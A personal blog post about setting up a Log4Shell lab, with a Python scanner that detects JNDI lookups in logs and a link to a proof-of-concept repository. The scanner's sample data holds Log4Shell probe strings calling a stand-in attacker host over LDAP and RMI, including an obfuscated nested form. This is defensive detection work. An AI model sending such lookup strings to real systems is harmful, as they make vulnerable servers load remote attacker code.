As one of the most critical vulnerabilities of recent times, for which I had to patch some systems myself at work, I just had to learn more about the internals of CVE-2021-44228/CVE-2021-45046, better known as Log4Shell.
It is by no means rocket science (in fact, it’s one of the most easily exploitable vulnerabilities of all time), but it still requires some work to set up a lab, figure out the right format of the exploit, etc.
I picked the LDAP attack vector where I enabled the trustedSource to quickly get where I wanted to be. Most likely, I will play with some more advanced forms like circumventing this trustedSource setting by using gadgets, or play around with the DNS or RMI vectors…
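All three vectors mentioned above (LDAP, RMI, DNS) start from the same thing reaching a Log4j logger: a JNDI lookup string. As an added example, not code from this post or from the linked repo, here is a small defender-side scanner that finds those lookups in log lines, including the well-documented nested `${lower:...}` / `${upper:...}` / `${...:-x}` forms that plain substring searches miss. The log lines, IP addresses and hostnames are constructed, and the list of URI schemes it reports is an assumption (the ones named in the post plus `ldaps`).

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from the original post). The probe
# arrives in any field that ends up in a log call; here it is the User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:rmi://attacker.example:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 403 0 "-" "${jndi:dns://canary.example/ping}"',
]

# Log4j 2 lookups that evaluate to a single literal value. Replacing them with
# that value folds a nested lookup back into the plain "${jndi:...}" form
# that Log4j itself would see after substitution.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# Schemes to report (assumption: the ones the post names, plus ldaps).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly resolve innermost single-value lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def detect(line: str) -> Optional[str]:
    """Return the lower-cased JNDI scheme found in the line, or None."""
    match = _JNDI.search(normalize(line))
    return match.group(1).lower() if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        scheme = detect(line)
        if scheme:
            hits.append((index, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: jndi lookup via {scheme}")
```

Matching on the normalized form rather than on the raw line is the important design choice: the lookup is only dangerous once Log4j has resolved it, so that is the representation to inspect. The scanner is intentionally narrow (it reports, it does not try to rewrite or block), which is all a log-review or hunting script needs.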
For now, the repo can be found here, for anyone to play with: https://github.com/ElJeffroz/log4j-poc
Enjoy!